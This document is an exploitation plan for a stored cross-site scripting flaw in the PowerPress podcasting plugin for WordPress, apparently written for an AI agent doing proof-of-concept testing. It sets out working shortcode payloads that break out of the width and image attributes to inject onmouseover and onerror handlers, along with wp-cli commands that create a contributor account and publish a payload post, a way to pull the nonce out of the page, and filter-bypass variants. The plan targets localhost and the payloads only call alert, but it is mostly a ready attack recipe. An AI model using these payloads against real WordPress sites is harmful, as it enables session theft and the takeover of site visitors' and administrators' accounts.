Exploitation Research Plan - CVE-2026-2988

1. Vulnerability Summary

The Blubrry PowerPress Podcasting plugin (versions <= 11.15.15) is vulnerable to Stored Cross-Site Scripting (XSS) via the [powerpress] and [podcast] shortcodes. The vulnerability exists because the shortcode handler, powerpress_shortcode_handler, accepts user-supplied attributes (such as image, width, and height) and passes them into HTML rendering filters without adequate sanitization or output escaping. While the plugin attempts to block javascript: protocols, it fails to prevent attribute breakouts (e.g., using " to inject event handlers like onmouseover).

2. Attack Vector Analysis

• Shortcodes: [powerpress], [podcast], and [display_podcast].
• Vulnerable Parameters: url, image, width, height.
• Authentication Level: Contributor or higher (any role with edit_posts capability).
• Endpoint: wp-admin/post.php (to save the post) and the frontend post URL (to trigger the XSS).
• Preconditions: The plugin must be active. The process_podpress setting may need to be enabled for the display_podcast shortcode, but powerpress and podcast are typically available by default.

3. Code Flow

1. Entry Point: A Contributor saves a post containing a shortcode:
   [powerpress url="http://example.com/audio.mp3" width='1" onmouseover="alert(1)"'].
2. Registration: powerpressplayer_init() (in powerpress-player.php) registers the shortcode handlers via add_shortcode.
3. Processing: When the post is viewed, WordPress calls powerpress_shortcode_handler($attributes, $content) (in powerpress-player.php).
4. Weak Sanitization: The handler runs a filter that only checks for the javascript: prefix:

   $attributes = array_filter($attributes, function ($var) {
       $var_without_whitespace = preg_replace("/\s+/", "", $var);
       if (strpos($var_without_whitespace, 'javascript:') === 0) {
           return ''; // Only blocks javascript: protocol
       } else {
           return $var;
       }
   });
   

5. Sink: The attributes are extracted and passed to the powerpress_player filter:

   $return = apply_filters('powerpress_player', '', ..., array('image'=>$image, 'type'=>$content_type,'width'=>$width, 'height'=>$height) );
   

6. Rendering: The filter handlers (e.g., powerpressplayer_mediaobjects_video or default MediaElement.js templates) take these raw strings and echo them into HTML attributes (e.g., <video width="..." ...>). Because width was not cast to an integer or escaped with esc_attr(), the injected " breaks out of the attribute.

4. Nonce Acquisition Strategy

Creating or editing a post via the web UI requires a WordPress core nonce (_wpnonce). Since this is a Stored XSS vulnerability initiated by an authenticated user, the agent should use the following strategy:

1. Role Context: Authenticate as a Contributor.
2. Action: Navigate to the "Add New Post" page.
3. Nonce Extraction:
   • Use browser_navigate to wp-admin/post-new.php.
   • Use browser_eval to extract the core nonce: browser_eval("document.querySelector('#_wpnonce').value").
4. Alternative (Recommended for PoC): Use wp-cli to bypass the need for nonce extraction during the injection phase, then use the http_request tool to verify the execution phase as a Guest or Admin.

5. Exploitation Strategy

Step 1: Inject Payload

Use wp-cli to create a post with a malicious shortcode. This simulates a Contributor saving a post.

Payload 1 (Attribute Breakout in width):

[powerpress url="https://content.blubrry.com/blubrrypreview/transcript_test_episode.mp3" width='1" onmouseover="alert(`XSS_WIDTH`)" style="display:block;width:1000px;height:1000px;border:1px solid red;"']

Payload 2 (Attribute Breakout in image):

[podcast url="https://content.blubrry.com/blubrrypreview/transcript_test_episode.mp3" image='https://example.com/fake.jpg" onerror="alert(`XSS_IMAGE`)"']

Step 2: Trigger XSS

Access the newly created post URL using the http_request tool.

Request:

• Method: GET
• URL: http://localhost:8080/?p=[POST_ID]
• Headers: User-Agent of a victim (e.g., Admin) or Guest.

Step 3: Identify Execution

Verify that the response contains the unescaped payload.

• Expected string in HTML: width="1" onmouseover="alert(XSS_WIDTH)"

6. Test Data Setup

1. Create User:
   wp user create attacker attacker@example.com --role=contributor --user_pass=password123
2. Create Post (Payload):
   wp post create --post_type=post --post_status=publish --post_title="Podcast Episode" --post_author=$(wp user get attacker --field=ID) --post_content='[powerpress url="https://content.blubrry.com/blubrrypreview/transcript_test_episode.mp3" width="1\" onmouseover=\"alert(document.domain)\" style=\"position:fixed;top:0;left:0;width:100%;height:100%;z-index:9999;\""]'

7. Expected Results

• The HTTP response from the post URL will contain the injected JavaScript event handler.
• The width attribute will be rendered as width="1".
• The onmouseover attribute will be present: onmouseover="alert(document.domain)".
• Because of the injected style attribute, the entire page becomes a "hover-trap," triggering the alert immediately upon mouse movement.

8. Verification Steps

1. Verify Storage:
   wp post get [POST_ID] --field=post_content
2. Verify Output (CLI):
   Execute a request and grep for the breakout:
   curl -s http://localhost:8080/?p=[POST_ID] | grep "onmouseover=\"alert"
3. Verify Output (Agent):
   Use http_request and check if body contains onmouseover="alert(document.domain)".

9. Alternative Approaches

If the width attribute is stripped or cast to an integer in a specific environment:

1. The image attribute: Use [powerpress image='x" onerror="alert(1)"']. PowerPress often renders the image as a poster attribute in a <video> tag or a src in an <img> tag.
2. The url attribute: Although checked for javascript:, the check is weak. Try:
   [powerpress url=" javascript:alert(1)"] (The preg_replace might fail depending on character encoding or specific whitespace bypasses like %0a).
3. The height attribute: Identical breakout logic to width.